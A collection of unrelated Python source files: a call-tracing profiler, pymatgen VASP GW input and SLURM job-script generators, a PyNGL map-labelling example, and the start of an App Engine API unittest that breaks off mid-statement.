as_matrix generic.py:1938
"""
def __init__(self, depth=1, silent=False, parent=False):
self.depth = depth
self.silent = silent
self.timings = []
self.frame_cache = {}
self._caller_cache = {}
self.parent = parent
self.stack_depth_cache = {}
def current_depth(self, frame):
current_depth = None
i = 0
f = frame.f_back
while f:
i += 1
parent_depth = self.stack_depth_cache.get(id(f), None)
if parent_depth is not None:
current_depth = i + parent_depth
break
# if we're already past depth, don't bother finding real depth
if i > self.depth:
return None
f = f.f_back
# should always at least get back to base parent
return current_depth
def trace_dispatch(self, frame, event, arg):
if len(self.stack_depth_cache) == 0:
# __enter__ is the intial frame
self.stack_depth_cache[id(frame.f_back)] = 0
# the lower parts get heavy. don't do anything or frames deeper
# than depth
current_depth = self.current_depth(frame)
if current_depth is None:
return
if current_depth > self.depth:
return
if event not in ['call', 'c_call']:
return
# skip built in funcs
if inspect.isbuiltin(arg):
return
# skip properties, we're only really interested in function calls
# this will unfortunently skip any important logic that is wrapped
# in property logic
code = frame.f_code
if is_property(code):
return
# note that get_parent is supa slow.
parent_name = None
if self.parent:
parent_name = get_parent(code)
indent, first_parent = self.indent_level(frame)
if event == "c_call":
func_name = arg.__name__
fn = (indent, "", 0, func_name, id(frame), id(first_parent), None)
elif event == 'call':
fcode = frame.f_code
fn = (indent, fcode.co_filename, fcode.co_firstlineno,
fcode.co_name, id(frame), id(first_parent), parent_name)
self.timings.append(fn)
def indent_level(self, frame):
i = 0
f = frame.f_back
first_parent = f
while f:
if id(f) in self.frame_cache:
i += 1
f = f.f_back
if i == 0:
# clear out the frame cache
self.frame_cache = {id(frame): True}
else:
self.frame_cache[id(frame)] = True
return i, first_parent
def to_frame(self):
data = self.timings
cols = ['indent', 'filename', 'lineno', 'func_name', 'frame_id',
'parent_id', 'parent_name']
df = pd.DataFrame(data, columns=cols)
df.loc[:, 'filename'] = df.filename.apply(
lambda s: os.path.basename(s)
)
return df
def __enter__(self):
sys.setprofile(self.trace_dispatch)
return self
def __exit__(self, type, value, traceback):
sys.setprofile(None)
if not self.silent:
self.pprint(self.depth)
def file_module_function_of(self, frame):
code = frame.f_code
filename = code.co_filename
if filename:
modulename = modname(filename)
else:
modulename = None
funcname = code.co_name
clsname = None
if code in self._caller_cache:
if self._caller_cache[code] is not None:
clsname = self._caller_cache[code]
else:
self._caller_cache[code] = None
# use of gc.get_referrers() was suggested by Michael Hudson
# all functions which refer to this code object
funcs = [f for f in gc.get_referrers(code)
if inspect.isfunction(f)]
# require len(func) == 1 to avoid ambiguity caused by calls to
# new.function(): "In the face of ambiguity, refuse the
# temptation to guess."
if len(funcs) == 1:
dicts = [d for d in gc.get_referrers(funcs[0])
if isinstance(d, dict)]
if len(dicts) == 1:
classes = [c for c in gc.get_referrers(dicts[0])
if hasattr(c, "__bases__")]
if len(classes) == 1:
# ditto for new.classobj()
clsname = classes[0].__name__
# cache the result - assumption is that new.* is
# not called later to disturb this relationship
# _caller_cache could be flushed if functions in
# the new module get called.
self._caller_cache[code] = clsname
if clsname is not None:
funcname = "%s.%s" % (clsname, funcname)
return filename, modulename, funcname
def gen_output(self, depth=None):
df = self.to_frame()
mask = df.filename == ''
mask = mask | df.func_name.isin(['<lambda>', '<genexpr>'])
mask = mask | df.func_name.str.startswith('__')
if depth:
mask = mask | (df.indent > depth)
MSG_FORMAT = "{indent}{func_name}{class_name} <{filename}:{lineno}>"
df = df.loc[~mask]
def format(row):
indent = row[0]
filename = row[1]
lineno = row[2]
func_name = row[3]
class_name = row[6] or ''
if class_name:
class_name = '::{class_name}'.format(class_name=class_name)
msg = MSG_FORMAT.format(indent=" "*indent*4, func_name=func_name,
filename=filename, lineno=lineno,
class_name=class_name)
return msg
df = df.reset_index(drop=True)
output = df.apply(format, axis=1, raw=True)
return output.values.tolist()
def pprint(self, depth=None):
output = self.gen_output(depth=depth)
print(("-" * 40))
print(("Follow Path (depth {depth}):".format(depth=depth)))
print(("-" * 40))
print(("\n".join(output)))
def diff(self, right, depth):
left_output = self.gen_output(depth)
right_output = right.gen_output(depth)
return DiffOutput(left_output, right_output)
class DiffOutput:
def __init__(self, left_output, right_output):
self.left_output = left_output
self.right_output = right_output
def __repr__(self):
return '\n'.join(difflib.ndiff(self.left_output, self.right_output))
def _repr_html_(self):
htmldiff = difflib.HtmlDiff()
diff = htmldiff.make_table(self.left_output, self.right_output)
return diff
|
|
# coding: utf-8
from __future__ import division, unicode_literals, print_function
"""
Input sets for VASP GW calculations
Single vasp GW work: Creates input and jobscripts from the input sets for a specific job
"""
__author__ = "Michiel van Setten"
__copyright__ = " "
__version__ = "0.9"
__maintainer__ = "Michiel van Setten"
__email__ = "mjvansetten@gmail.com"
__date__ = "May 2014"
import os
import json
import os.path
import stat
from pymatgen.io.vaspio.vasp_input import Kpoints, Potcar
from pymatgen.io.vaspio_set import DictVaspInputSet
from pymatgen.io.gwwrapper.helpers import s_name
MODULE_DIR = os.path.dirname(os.path.abspath(__file__))
"""
MPGWVaspInputSet.joson contains the standards for GW calculations. This set contains all
parameters for the first sc dft calculation. The modifications for the subsequent
sub calculations are made below.
For many settings the number of cores on which the calculations will be run is needed, this
number is assumed to be on the environment variable NPARGWCALC.
"""
class GWscDFTPrepVaspInputSet(DictVaspInputSet):
"""
Implementation of VaspInputSet overriding MaterialsProjectVaspInputSet
for static calculations preparing for a GW calculation.
"""
TESTS = {}
CONVS = {}
def __init__(self, structure, spec, functional='PBE', sym_prec=0.01, **kwargs):
"""
Supports the same kwargs as :class:`JSONVaspInputSet`.
"""
with open(os.path.join(MODULE_DIR, "GWVaspInputSet.json")) as f:
DictVaspInputSet.__init__(
self, "MP Static Self consistent run for GW", json.load(f), **kwargs)
self.structure = structure
self.tests = self.__class__.get_defaults_tests()
self.convs = self.__class__.get_defaults_convs()
self.functional = functional
self.set_dens(spec)
self.sym_prec = sym_prec
# todo update the fromdict and todict ot include the new atributes
@classmethod
def get_defaults_tests(cls):
return cls.TESTS.copy()
@classmethod
def get_defaults_convs(cls):
return cls.CONVS.copy()
def get_npar(self, structure):
"""
get 'optimally' useful number of parallelism
"""
npar = int(self.get_bands(structure) ** 2 * structure.volume / 600)
npar = min(max(npar, 1), 52)
return npar
def set_test(self, test, value):
"""
Method to switch a specific test on
"""
all_tests = GWscDFTPrepVaspInputSet.get_defaults_tests()
all_tests.update(GWDFTDiagVaspInputSet.get_defaults_tests())
all_tests.update(GWG0W0VaspInputSet.get_defaults_tests())
test_type = all_tests[test]['method']
npar = self.get_npar(self.structure)
if test_type == 'incar_settings':
self.incar_settings.update({test: value})
if test_type == 'set_nomega':
nomega = npar * int(value / npar)
self.incar_settings.update({"NOMEGA": int(nomega)})
if test_type == 'set_nbands':
nbands = value * self.get_bands(self.structure)
nbands = npar * int(nbands / npar + 1)
self.incar_settings.update({"NBANDS": int(nbands)})
if test_type == 'kpoint_grid':
pass
def get_potcar(self, structure):
"""
Method for getting LDA potcars
"""
if self.sort_structure:
structure = structure.get_sorted_structure()
return Potcar(self.get_potcar_symbols(structure), functional=self.functional)
def get_kpoints(self, structure):
"""
Writes out a KPOINTS file using the automated gamma grid method.
VASP crashes GW calculations on none gamma centered meshes.
"""
if self.sort_structure:
structure = structure.get_sorted_structure()
dens = int(self.kpoints_settings['grid_density'])
if dens == 1:
return Kpoints.gamma_automatic()
else:
return Kpoints.automatic_gamma_density(structure, dens)
def set_dens(self, spec):
"""
sets the grid_density to the value specified in spec
"""
self.kpoints_settings['grid_density'] = spec['kp_grid_dens']
if spec['kp_grid_dens'] < 100:
self.incar_settings.update({'ISMEAR': 0})
def get_electrons(self, structure):
"""
Method for retrieving the number of valence electrons
"""
valence_list = {}
potcar = self.get_potcar(structure)
for pot_single in potcar:
valence_list.update({pot_single.element: pot_single.nelectrons})
electrons = sum([valence_list[element.symbol] for element in structure.species])
return int(electrons)
def get_bands(self, structure):
"""
Method for retrieving the standard number of bands
"""
bands = self.get_electrons(structure) / 2 + len(structure)
return int(bands)
def set_test_calc(self):
"""
absolute minimal setting for testing
"""
self.incar_settings.update({"PREC": "low", "ENCUT": 250})
self.kpoints_settings['grid_density'] = 1
def set_prec_high(self):
self.incar_settings.update({"PREC": "Accurate", "ENCUT": 400})
class GWDFTDiagVaspInputSet(GWscDFTPrepVaspInputSet):
"""
Implementation of VaspInputSet overriding MaterialsProjectVaspInputSet
for static non self-consistent exact diagonalization step preparing for
a GW calculation.
"""
TESTS = {'NBANDS': {'test_range': (10, 20, 30), 'method': 'set_nbands', 'control': "gap"}}
CONVS = {'NBANDS': {'test_range': (10, 20, 30, 40, 50, 60, 70), 'method': 'set_nbands', 'control': "gap"}}
def __init__(self, structure, spec, functional='PBE', sym_prec=0.01, **kwargs):
"""
Supports the same kwargs as :class:`JSONVaspInputSet`.
"""
with open(os.path.join(MODULE_DIR, "GWVaspInputSet.json")) as f:
DictVaspInputSet.__init__(
self, "MP Static exact diagonalization", json.load(f), **kwargs)
self.structure = structure
self.tests = self.__class__.get_defaults_tests()
self.convs = self.__class__.get_defaults_convs()
self.functional = functional
self.sym_prec = sym_prec
self.set_dens(spec)
npar = self.get_npar(self.structure)
#single step exact diagonalization, output WAVEDER
self.incar_settings.update({"ALGO": "Exact", "NELM": 1, "LOPTICS": "TRUE"})
# for large systems exact diagonalization consumes too much memory
self.set_gw_bands(15)
self.incar_settings.update({"NPAR": npar})
def set_gw_bands(self, factor=15):
"""
method to set the number of bands for GW
"""
gw_bands = self.get_bands(self.structure)
gw_bands = self.get_npar(self.structure) * int((factor * gw_bands) / self.get_npar(self.structure) + 1)
self.incar_settings.update({"NBANDS": gw_bands})
if gw_bands > 800:
self.incar_settings.update({"ALGO": 'fast'})
def set_prec_high(self):
super(GWDFTDiagVaspInputSet, self).set_prec_high()
self.set_gw_bands(30)
class GWG0W0VaspInputSet(GWDFTDiagVaspInputSet):
"""
Should go to Pymatgen vaspinputsets
Implementation of VaspInputSet overriding MaterialsProjectVaspInputSet
for static G0W0 calculation
"""
TESTS = {'ENCUTGW': {'test_range': (200, 300, 400), 'method': 'incar_settings', 'control': "gap"},
'NOMEGA': {'test_range': (80, 100, 120), 'method': 'set_nomega', 'control': "gap"}}
CONVS = {'ENCUTGW': {'test_range': (200, 400, 600, 800), 'method': 'incar_settings', 'control': "gap"}}
def __init__(self, structure, spec, functional='PBE', sym_prec=0.01, **kwargs):
"""
Supports the same kwargs as :class:`JSONVaspInputSet`.
"""
with open(os.path.join(MODULE_DIR, "GWVaspInputSet.json")) as f:
DictVaspInputSet.__init__(
self, "MP Static G0W0", json.load(f), **kwargs)
self.structure = structure
self.tests = self.__class__.get_defaults_tests()
self.convs = self.__class__.get_defaults_convs()
self.functional = functional
self.sym_prec = sym_prec
npar = self.get_npar(structure)
# G0W0 calculation with reduced cutoff for the response function
self.incar_settings.update({"ALGO": "GW0", "ENCUTGW": 250, "LWAVE": "FALSE", "NELM": 1})
self.set_dens(spec)
self.nomega_max = 2 * self.get_kpoints(structure).kpts[0][0]**3
nomega = npar * int(self.nomega_max / npar)
self.set_gw_bands(15)
self.incar_settings.update({"NPAR": npar})
self.incar_settings.update({"NOMEGA": nomega})
self.tests = self.__class__.get_defaults_tests()
def wannier_on(self):
self.incar_settings.update({"LWANNIER90_RUN": ".TRUE."})
self.incar_settings.update({"LWRITE_MMN_AMN": ".TRUE."})
def spectral_off(self):
"""
Method to switch the use of the spectral decomposition of the response function of
this may be used to reduce memory demands if the calculation crashes due to memory shortage
"""
self.incar_settings.update({"LSPECTRAL": ".False."})
def gw0_on(self, niter=4, gwbandsfac=4, qpsc=False):
"""
Method to switch to gw0 calculation with standard 4 iterations
"""
# set the number of iterations of GW0
self.incar_settings.update({"NELM": niter})
# set the number of bands to update in the iteration of G
npar = self.get_npar(self.structure)
nbandsgw = self.get_bands(self.structure)*gwbandsfac
nbandsgw = npar * int(nbandsgw / npar)
self.incar_settings.update({"NBANDSGW": nbandsgw})
# if set also updat the orbitals 'quasi particle self-consistency'
if qpsc:
self.incar_settings.update({"ALGO": "scGW0"})
# todo update tests ....
def set_prec_high(self):
super(GWG0W0VaspInputSet, self).set_prec_high()
self.incar_settings.update({"ENCUTGW": 400, "NOMEGA": int(self.incar_settings["NOMEGA"]*1.5)})
self.incar_settings.update({"PRECFOCK": "accurate"})
class Wannier90InputSet():
"""
class containing the input parameters for the wannier90.win file
"""
def __init__(self, spec):
self.file_name = "wannier90.win"
self.settings = {"bands_plot": "true", "num_wann": 2, "num_bands": 4}
self.parameters = {"n_include_bands": 1}
self.spec = spec
def make_kpoint_path(self, structure, f):
f.write("\nbegin kpoint_path\n")
line = str(structure.vbm_l) + " " + str(structure.vbm[0]) + " " + str(structure.vbm[1]) + " " + str(structure.vbm[2])
line = line + " " + str(structure.cbm_l) + " " + str(structure.cbm[0]) + " " + str(structure.cbm[1]) + " " + str(structure.cbm[2])
f.write(line)
f.write("\nend kpoint_path\n\n")
pass
def make_exclude_bands(self, structure, f):
nocc = GWscDFTPrepVaspInputSet(structure, self.spec).get_electrons(structure) / 2
n1 = str(int(1))
n2 = str(int(nocc - self.parameters["n_include_bands"]))
n3 = str(int(nocc + 1 + self.parameters["n_include_bands"]))
n4 = str(int(GWG0W0VaspInputSet(structure, self.spec).incar_settings["NBANDS"]))
line = "exclude_bands : " + n1 + "-" + n2 + ", " + n3 + "-" + n4 + "\n"
f.write(line)
#todo there is still a bug here...
pass
def write_file(self, structure, path):
f = open(os.path.join(path, self.file_name), mode='w')
f.write("bands_plot = ")
f.write(self.settings["bands_plot"])
f.write("\n")
self.make_kpoint_path(structure, f)
f.write("num_wann = ")
f.write(str(self.settings["num_wann"]))
f.write("\n")
f.write("num_bands = ")
f.write(str(self.settings["num_bands"]))
f.write("\n")
self.make_exclude_bands(structure, f)
f.close()
class SingleVaspGWWork():
"""
Create VASP input for a single standard G0W0 and GW0 calculation step
the combination of job and option specifies what needs to be created
"""
def __init__(self, structure, job, spec, option=None, converged=False):
self.structure = structure
self.job = job
self.spec = spec
self.option = option
self.converged = converged
def create_input(self):
"""
create vasp input
"""
option_name = ''
path_add = ''
if self.spec['converge'] and self.converged:
path_add = '.conv'
if self.option is None:
path = s_name(self.structure)
else:
path = os.path.join(s_name(self.structure) + path_add,
str(self.option['test_prep'])+str(self.option['value_prep']))
if 'test' in self.option.keys():
option_name = '.'+str(self.option['test'])+str(self.option['value'])
if self.job == 'prep':
inpset = GWscDFTPrepVaspInputSet(self.structure, self.spec, functional=self.spec['functional'])
if self.spec['converge'] and not self.converged:
spec_tmp = self.spec.copy()
spec_tmp.update({'kp_grid_dens': 2})
inpset = GWscDFTPrepVaspInputSet(self.structure, spec_tmp, functional=self.spec['functional'])
inpset.incar_settings.update({"ENCUT": 800})
if self.spec['test'] or self.spec['converge']:
if self.option['test_prep'] in GWscDFTPrepVaspInputSet.get_defaults_convs().keys() or self.option['test_prep'] in GWscDFTPrepVaspInputSet.get_defaults_tests().keys():
inpset.set_test(self.option['test_prep'], self.option['value_prep'])
if self.spec["prec"] == "h":
inpset.set_prec_high()
inpset.write_input(self.structure, path)
inpset = GWDFTDiagVaspInputSet(self.structure, self.spec, functional=self.spec['functional'])
if self.spec["prec"] == "h":
inpset.set_prec_high()
if self.spec['converge'] and not self.converged:
spec_tmp = self.spec.copy()
spec_tmp.update({'kp_grid_dens': 2})
inpset = GWDFTDiagVaspInputSet(self.structure, spec_tmp, functional=self.spec['functional'])
inpset.incar_settings.update({"ENCUT": 800})
if self.spec['test'] or self.spec['converge']:
inpset.set_test(self.option['test_prep'], self.option['value_prep'])
inpset.get_incar(self.structure).write_file(os.path.join(path, 'INCAR.DIAG'))
if self.job == 'G0W0':
inpset = GWG0W0VaspInputSet(self.structure, self.spec, functional=self.spec['functional'])
if self.spec['converge'] and not self.converged:
spec_tmp = self.spec.copy()
spec_tmp.update({'kp_grid_dens': 2})
inpset = GWG0W0VaspInputSet(self.structure, spec_tmp, functional=self.spec['functional'])
inpset.incar_settings.update({"ENCUT": 800})
if self.spec['test'] or self.spec['converge']:
inpset.set_test(self.option['test_prep'], self.option['value_prep'])
inpset.set_test(self.option['test'], self.option['value'])
if self.spec["prec"] == "h":
inpset.set_prec_high()
if self.spec['kp_grid_dens'] > 20:
inpset.wannier_on()
inpset.write_input(self.structure, os.path.join(path, 'G0W0'+option_name))
w_inpset = Wannier90InputSet(self.spec)
w_inpset.write_file(self.structure, os.path.join(path, 'G0W0'+option_name))
else:
inpset.write_input(self.structure, os.path.join(path, 'G0W0'+option_name))
if self.job == 'GW0':
inpset = GWG0W0VaspInputSet(self.structure, self.spec, functional=self.spec['functional'])
if self.spec['converge'] and not self.converged:
spec_tmp = self.spec.copy()
spec_tmp.update({'kp_grid_dens': 2})
inpset = GWG0W0VaspInputSet(self.structure, spec_tmp, functional=self.spec['functional'])
inpset.incar_settings.update({"ENCUT": 800})
if self.spec['test'] or self.spec['converge']:
inpset.set_test(self.option['test_prep'], self.option['value_prep'])
inpset.set_test(self.option['test'], self.option['value'])
if self.spec["prec"] == "h":
inpset.set_prec_high()
inpset.gw0_on()
if self.spec['kp_grid_dens'] > 20:
inpset.wannier_on()
inpset.write_input(self.structure, os.path.join(path, 'GW0'+option_name))
w_inpset = Wannier90InputSet(self.spec)
w_inpset.write_file(self.structure, os.path.join(path, 'GW0'+option_name))
else:
inpset.write_input(self.structure, os.path.join(path, 'GW0'+option_name))
if self.job == 'scGW0':
inpset = GWG0W0VaspInputSet(self.structure, self.spec, functional=self.spec['functional'])
if self.spec['converge'] and not self.converged:
spec_tmp = self.spec.copy()
spec_tmp.update({'kp_grid_dens': 2})
inpset = GWG0W0VaspInputSet(self.structure, spec_tmp, functional=self.spec['functional'])
inpset.incar_settings.update({"ENCUT": 800})
if self.spec['test'] or self.spec['converge']:
inpset.set_test(self.option['test_prep'], self.option['value_prep'])
inpset.set_test(self.option['test'], self.option['value'])
if self.spec["prec"] == "h":
inpset.set_prec_high()
inpset.gw0_on(qpsc=True)
if self.spec['kp_grid_dens'] > 20:
inpset.wannier_on()
inpset.write_input(self.structure, os.path.join(path, 'scGW0'+option_name))
w_inpset = Wannier90InputSet(self.spec)
w_inpset.write_file(self.structure, os.path.join(path, 'scGW0'+option_name))
else:
inpset.write_input(self.structure, os.path.join(path, 'scGW0'+option_name))
def create_job_script(self, add_to_collection=True):
"""
Create job script for ceci.
"""
npar = GWscDFTPrepVaspInputSet(self.structure, self.spec,
functional=self.spec['functional']).get_npar(self.structure)
if self.option is not None:
option_prep_name = str(self.option['test_prep']) + str(self.option['value_prep'])
if 'test' in self.option.keys():
option_name = str('.') + str(self.option['test']) + str(self.option['value'])
else:
option_prep_name = option_name = ''
# npar = int(os.environ['NPARGWCALC'])
header = ("#!/bin/bash \n"
"## standard header for Ceci clusters ## \n"
"#SBATCH --mail-user=michiel.vansetten@uclouvain.be \n"
"#SBATCH --mail-type=ALL\n"
"#SBATCH --time=2-24:0:0 \n"
"#SBATCH --cpus-per-task=1 \n"
"#SBATCH --mem-per-cpu=4000 \n")
path_add = ''
if self.spec['converge'] and self.converged:
path_add = '.conv'
if self.job == 'prep':
path = os.path.join(s_name(self.structure) + path_add, option_prep_name)
# create this job
job_file = open(name=os.path.join(path, 'job'), mode='w')
job_file.write(header)
job_file.write('#SBATCH --job-name='+s_name(self.structure)+self.job+'\n')
job_file.write('#SBATCH --ntasks='+str(npar)+'\n')
job_file.write('module load vasp \n')
job_file.write('mpirun vasp \n')
job_file.write('cp OUTCAR OUTCAR.sc \n')
job_file.write('cp INCAR.DIAG INCAR \n')
job_file.write('mpirun vasp \n')
job_file.write('cp OUTCAR OUTCAR.diag \n')
job_file.close()
os.chmod(os.path.join(path, 'job'), stat.S_IRWXU)
if add_to_collection:
job_file = open("job_collection", mode='a')
job_file.write('cd ' + path + ' \n')
job_file.write('sbatch job \n')
job_file.write('cd .. \n')
job_file.close()
os.chmod("job_collection", stat.S_IRWXU)
if self.job in ['G0W0', 'GW0', 'scGW0']:
path = os.path.join(s_name(self.structure) + path_add, option_prep_name, self.job + option_name)
# create this job
job_file = open(name=path+'/job', mode='w')
job_file.write(header)
job_file.write('#SBATCH --job-name='+s_name(self.structure)+self.job+'\n')
job_file.write('#SBATCH --ntasks='+str(npar)+'\n')
job_file.write('module load vasp/5.2_par_wannier90 \n')
job_file.write('cp ../CHGCAR ../WAVECAR ../WAVEDER . \n')
job_file.write('mpirun vasp \n')
job_file.write('rm W* \n')
#job_file.write('workon pymatgen-GW; get_gap > gap; deactivate')
#job_file.write('echo '+path+'`get_gap` >> ../../gaps.dat')
job_file.close()
os.chmod(path+'/job', stat.S_IRWXU)
path = os.path.join(s_name(self.structure) + path_add, option_prep_name)
# 'append submission of this job script to that of prep for this structure'
if add_to_collection:
job_file = open(name=os.path.join(path, 'job'), mode='a')
job_file.write('cd ' + self.job + option_name + ' \n')
job_file.write('sbatch job \n')
job_file.write('cd .. \n')
job_file.close()
|
|
#
# File:
# mptick_10.py
#
# Synopsis:
# Demonstrates how to mask Lambert Conformal Projection map.
# Shows how to add your own longitude/latitude labels to a
# masked Lambert Conformal plot.
#
# Categories:
# map plot
#
# Based on NCL example:
# mptick_10.ncl
#
# Author:
# Karin Meier-Fleischer
#
# Date of initial publication:
# November 2018
#
# Description:
# This example shows how to create a map.
#
# Effects illustrated:
# o Adding longitude/latitude labels to a masked Lambert Conformal map
# o Moving the main title up
# o Attaching text strings to the outside of a plot
# o Converting lat/lon values to NDC values
# o Changing the angle of text strings
# o Adding a carriage return to a text string using a function code
#
# Output:
# Two visualizations are produced.
#
'''
PyNGL Example: mptick_10.py
- Adding longitude/latitude labels to a masked Lambert Conformal map
- Moving the main title up
- Attaching text strings to the outside of a plot
- Converting lat/lon values to NDC values
- Changing the angle of text strings
- Adding a carriage return to a text string using a function code
'''
from __future__ import print_function
import numpy as np
import Ngl
#-------------------------------------------------------
# Function to attach lat/lon labels to a Robinson plot
#-------------------------------------------------------
def add_labels_lcm(wks,map,dlat,dlon):
PI = 3.14159
RAD_TO_DEG = 180./PI
#-- determine whether we are in northern or southern hemisphere
if (float(minlat) >= 0. and float(maxlat) > 0.):
HEMISPHERE = "NH"
else:
HEMISPHERE = "SH"
#-- pick some "nice" values for the latitude labels.
lat_values = np.arange(int(minlat),int(maxlat),10)
lat_values = lat_values.astype(float)
nlat = len(lat_values)
#-- We need to get the slope of the left and right min/max longitude lines.
#-- Use NDC coordinates to do this.
lat1_ndc = 0.
lon1_ndc = 0.
lat2_ndc = 0.
lon2_ndc = 0.
lon1_ndc,lat1_ndc = Ngl.datatondc(map,minlon,lat_values[0])
lon2_ndc,lat2_ndc = Ngl.datatondc(map,minlon,lat_values[nlat-1])
slope_lft = (lat2_ndc-lat1_ndc)/(lon2_ndc-lon1_ndc)
lon1_ndc,lat1_ndc = Ngl.datatondc(map,maxlon,lat_values[0])
lon2_ndc,lat2_ndc = Ngl.datatondc(map,maxlon,lat_values[nlat-1])
slope_rgt = (lat2_ndc-lat1_ndc)/(lon2_ndc-lon1_ndc)
#-- set some text resources
txres = Ngl.Resources()
txres.txFontHeightF = 0.01
txres.txPosXF = 0.1
#-- Loop through lat values, and attach labels to the left and right edges of
#-- the masked LC plot. The labels will be rotated to fit the line better.
dum_lft = [] #-- assign arrays
dum_rgt = [] #-- assign arrays
lat_label_lft = [] #-- assign arrays
lat_label_rgt = [] #-- assign arrays
for n in range(0,nlat):
#-- left label
if(HEMISPHERE == "NH"):
rotate_val = -90.
direction = "N"
else:
rotate_val = 90.
direction = "S"
#-- add extra white space to labels
lat_label_lft.append("{}~S~o~N~{} ".format(str(np.abs(lat_values[n])),direction))
lat_label_rgt.append(" {}~S~o~N~{}".format(str(np.abs(lat_values[n])),direction))
txres.txAngleF = RAD_TO_DEG * np.arctan(slope_lft) + rotate_val
dum_lft.append(Ngl.add_text(wks,map,lat_label_lft[n],minlon,lat_values[n],txres))
#-- right label
if(HEMISPHERE == "NH"):
rotate_val = 90
else:
rotate_val = -90
txres.txAngleF = RAD_TO_DEG * np.arctan(slope_rgt) + rotate_val
dum_rgt.append(Ngl.add_text(wks,map,lat_label_rgt[n],maxlon,lat_values[n],txres))
#----------------------------------------------------------------------
# Now do longitude labels. These are harder because we're not adding
# them to a straight line.
# Loop through lon values, and attach labels to the bottom edge for
# northern hemisphere, or top edge for southern hemisphere.
#----------------------------------------------------------------------
del(txres.txPosXF)
txres.txPosYF = -5.0
#-- pick some "nice" values for the longitude labels
lon_values = np.arange(int(minlon+10),int(maxlon-10),10).astype(float)
lon_values = np.where(lon_values > 180, 360-lon_values, lon_values)
nlon = lon_values.size
dum_bot = [] #-- assign arrays
lon_labels = [] #-- assign arrays
if(HEMISPHERE == "NH"):
lat_val = minlat
else:
lat_val = maxlat
ctrl = "~C~"
for n in range(0,nlon):
if(lon_values[n] < 0):
if(HEMISPHERE == "NH"):
lon_labels.append("{}~S~o~N~W{}".format(str(np.abs(lon_values[n])),ctrl))
else:
lon_labels.append("{}{}~S~o~N~W".format(ctrl,str(np.abs(lon_values[n]))))
elif(lon_values[n] > 0):
if(HEMISPHERE == "NH"):
lon_labels.append("{}~S~o~N~E{}".format(str(lon_values[n]),ctrl))
else:
lon_labels.append("{}{}~S~o~N~E".format(ctrl,str(lon_values[n])))
else:
if(HEMISPHERE == "NH"):
lon_labels.append("{}0~S~o~N~{}".format(ctrl,ctrl))
else:
lon_labels.append("{}0~S~o~N~{}".format(ctrl,ctrl))
#-- For each longitude label, we need to figure out how much to rotate
#-- it, so get the approximate slope at that point.
if(HEMISPHERE == "NH"): #-- add labels to bottom of LC plot
lon1_ndc,lat1_ndc = Ngl.datatondc(map, lon_values[n]-0.5, minlat)
lon2_ndc,lat2_ndc = Ngl.datatondc(map, lon_values[n]+0.5, minlat)
txres.txJust = "TopCenter"
else: #-- add labels to top of LC plot
lon1_ndc,lat1_ndc = Ngl.datatondc(map, lon_values[n]+0.5, maxlat)
lon2_ndc,lat2_ndc = Ngl.datatondc(map, lon_values[n]-0.5, maxlat)
txres.txJust = "BottomCenter"
slope_bot = (lat1_ndc-lat2_ndc)/(lon1_ndc-lon2_ndc)
txres.txAngleF = RAD_TO_DEG * np.arctan(slope_bot)
#-- attach to map
dum_bot.append(Ngl.add_text(wks, map, str(lon_labels[n]), \
lon_values[n], lat_val, txres))
return
#-------------------------------------------------------
# MAIN
#-------------------------------------------------------
wks = Ngl.open_wks("png","plot_mptick_10") #-- open workstation
#-----------------------------------
#-- first plot: Lambert Conformal
#-----------------------------------
#-- northern hemisphere
minlon = -90. #-- min lon to mask
maxlon = 40. #-- max lon to mask
minlat = 20. #-- min lat to mask
maxlat = 80. #-- max lat to mask
mpres = Ngl.Resources() #-- resource object
mpres.nglMaximize = True
mpres.nglDraw = False #-- turn off plot draw and frame advance. We will
mpres.nglFrame = False #-- do it later after adding subtitles.
mpres.mpFillOn = True #-- turn map fill on
mpres.mpOutlineOn = False #-- outline map
mpres.mpOceanFillColor = "Transparent" #-- set ocean fill color to transparent
mpres.mpLandFillColor = "Gray90" #-- set land fill color to gray
mpres.mpInlandWaterFillColor = "Gray90" #-- set inland water fill color to gray
mpres.tiMainString = "Adding lat/lon labels to a masked LC map~C~(northern hemisphere)"
mpres.tiMainOffsetYF = 0.05
mpres.tiMainFontHeightF = 0.016 #-- decrease font size
mpres.mpProjection = "LambertConformal"
mpres.nglMaskLambertConformal = True #-- turn on lc masking
mpres.mpLambertParallel1F = 10
mpres.mpLambertParallel2F = 70
mpres.mpLambertMeridianF = -100
mpres.mpLimitMode = "LatLon"
mpres.mpMinLonF = minlon
mpres.mpMaxLonF = maxlon
mpres.mpMinLatF = minlat
mpres.mpMaxLatF = maxlat
mpres.mpGridAndLimbOn = True
mpres.mpGridSpacingF = 10.
mpres.pmTickMarkDisplayMode = "Always"
#-- create and draw the basic map
map = Ngl.map(wks,mpres)
#-- add labels to the plot
tx = add_labels_lcm(wks,map,10,10)
#-- draw the plot and advance the frame
Ngl.maximize_plot(wks,map)
Ngl.draw(map)
Ngl.frame(wks)
#-----------------------------------
#-- second plot: Mercator projection
#-----------------------------------
#-- southern hemisphere
minlat = -80. #-- min lat to mask
maxlat = -20. #-- max lat to mask
mpres.mpMinLatF = minlat
mpres.mpMaxLatF = maxlat
mpres.tiMainString = "Adding lat/lon labels to a masked LC map~C~(southern hemisphere)"
#-- create and draw the basic map
map = Ngl.map(wks,mpres)
#-- add labels to the plot
tx = add_labels_lcm(wks,map,10,10)
#-- maximize the plot, draw it and advance the frame
Ngl.maximize_plot(wks,map)
Ngl.draw(map)
Ngl.frame(wks)
Ngl.end()
|
|
import copy
import datetime
import unittest2
import webtest
import json
import md5
import api_main
import cron_main
from google.appengine.api import taskqueue
from google.appengine.ext import ndb
from google.appengine.ext import testbed
from consts.account_permissions import AccountPermissions
from consts.auth_type import AuthType
from consts.event_type import EventType
from consts.media_type import MediaType
from consts.playoff_type import PlayoffType
from models.account import Account
from models.api_auth_access import ApiAuthAccess
from models.award import Award
from models.event import Event
from models.event_team import EventTeam
from models.match import Match
from models.media import Media
from models.sitevar import Sitevar
from models.team import Team
from models.zebra_motionworks import ZebraMotionWorks
class TestApiTrustedController(unittest2.TestCase):
def setUp(self):
self.testapp = webtest.TestApp(api_main.app)
self.cronapp = webtest.TestApp(cron_main.app)
self.testbed = testbed.Testbed()
self.testbed.activate()
self.testbed.init_datastore_v3_stub()
self.testbed.init_urlfetch_stub()
self.testbed.init_memcache_stub()
self.testbed.init_user_stub()
ndb.get_context().clear_cache() # Prevent data from leaking between tests
self.testbed.init_taskqueue_stub(root_path=".")
self.taskqueue_stub = self.testbed.get_stub(testbed.TASKQUEUE_SERVICE_NAME)
self.teams_auth = ApiAuthAccess(id='tEsT_id_0',
secret='321tEsTsEcReT',
description='test',
